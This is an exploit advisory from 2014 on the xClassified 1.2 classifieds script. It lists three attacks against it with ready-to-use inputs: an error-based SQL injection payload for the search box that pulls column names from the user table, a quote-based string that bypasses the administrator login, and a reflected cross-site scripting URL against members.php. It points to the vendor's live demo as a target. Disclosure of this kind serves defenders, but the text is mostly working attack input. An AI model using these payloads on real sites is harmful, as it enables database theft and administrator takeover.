# Exploit Title : xClassified 1.2 Multiple Vulnerabilities
# Vendor : http://xclassified.artifectx.com/
# Date Found : 2014-07-08


Vulnerabilities : SQL Injection / Login Bypass / XSS

=================

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

---------------------

SQL Injection :

Method : POST In Search Section .

Input Your SQLi Payload In Search TextBox .

example payload : 'and(select 1,2 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_schema=0x78636C6173736966696564 and table_name=0x75736572 limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)and'

Response : Duplicate entry 'UserId1' for key 'group_key'

---------------------

Login Bypass :

Admin Page : TARGET/administrator/

String For Bypass :  '=' 'or'

---------------------

Cross Site Scripting (XSS) :

[After Login In Admin Page] 

Method : GET

http://TARGET/demo/administrator/members.php?actionuser="><script>alert(/Hadi/)</script>

---------------------

Demo : http://xclassified.artifectx.com/demo/

---------------------

Credit : Hadi Arjmand , SeCTime.Ir
Thanks To Mr.HS3c - All Iranian Researchers And Exploiters

----- End -----